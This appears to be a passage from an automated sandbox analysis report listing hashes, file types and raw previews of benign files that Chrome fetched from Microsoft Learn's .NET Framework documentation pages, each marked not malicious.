                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                        MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                        SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                        SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                        SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                        URL:https://learn.microsoft.com/favicon.ico
                                                                                                                                                                                        Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                        Size (bytes):1817143
                                                                                                                                                                                        Entropy (8bit):5.501007973622959
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                        MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                        SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                        SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                        SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        URL:https://learn.microsoft.com/static/assets/0.4.028726178/scripts/en-us/index-docs.js
                                                                                                                                                                                        Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):5644
                                                                                                                                                                                        Entropy (8bit):4.785769732002188
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                        MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                        SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                        SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                        SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):17174
                                                                                                                                                                                        Entropy (8bit):2.9129715116732746
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                        MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                        SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                        SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                        SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                        Size (bytes):13842
                                                                                                                                                                                        Entropy (8bit):7.802399161550213
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                        MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                        SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                        SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                        SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
                                                                                                                                                                                        Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):33148
                                                                                                                                                                                        Entropy (8bit):4.917595394577667
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                        MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                        SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                        SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                        SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                        Size (bytes):5644
                                                                                                                                                                                        Entropy (8bit):4.785769732002188
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                        MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                        SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                        SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                        SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
                                                                                                                                                                                        Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):64291
                                                                                                                                                                                        Entropy (8bit):7.964191793580486
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
                                                                                                                                                                                        MD5:8CCB0248B7F2ABEEAD74C057232DF42A
                                                                                                                                                                                        SHA1:C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
                                                                                                                                                                                        SHA-256:0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
                                                                                                                                                                                        SHA-512:6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                        Size (bytes):35005
                                                                                                                                                                                        Entropy (8bit):7.980061050467981
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                        MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                        SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                        SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                        SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
                                                                                                                                                                                        Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                        Size (bytes):4897
                                                                                                                                                                                        Entropy (8bit):4.8007377074457604
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                        MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                        SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                        SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                        SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
                                                                                                                                                                                        Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                        Size (bytes):64291
                                                                                                                                                                                        Entropy (8bit):7.964191793580486
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
                                                                                                                                                                                        MD5:8CCB0248B7F2ABEEAD74C057232DF42A
                                                                                                                                                                                        SHA1:C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
                                                                                                                                                                                        SHA-256:0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
                                                                                                                                                                                        SHA-512:6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/media/event-banners/banner-learn-challenge-2024.jpg
                                                                                                                                                                                        Preview:......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1173007
                                                                                                                                                                                        Entropy (8bit):5.503893944397598
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                        MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                        SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                        SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                        SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1817143
                                                                                                                                                                                        Entropy (8bit):5.501007973622959
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                        MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                        SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                        SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                        SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1432
                                                                                                                                                                                        Entropy (8bit):4.986131881931089
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                        MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                        SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                        SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                        SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                        Size (bytes):1154
                                                                                                                                                                                        Entropy (8bit):4.59126408969148
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                        MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                        SHA1:603A4E9115E613CC827206CF792C62AEB606C941
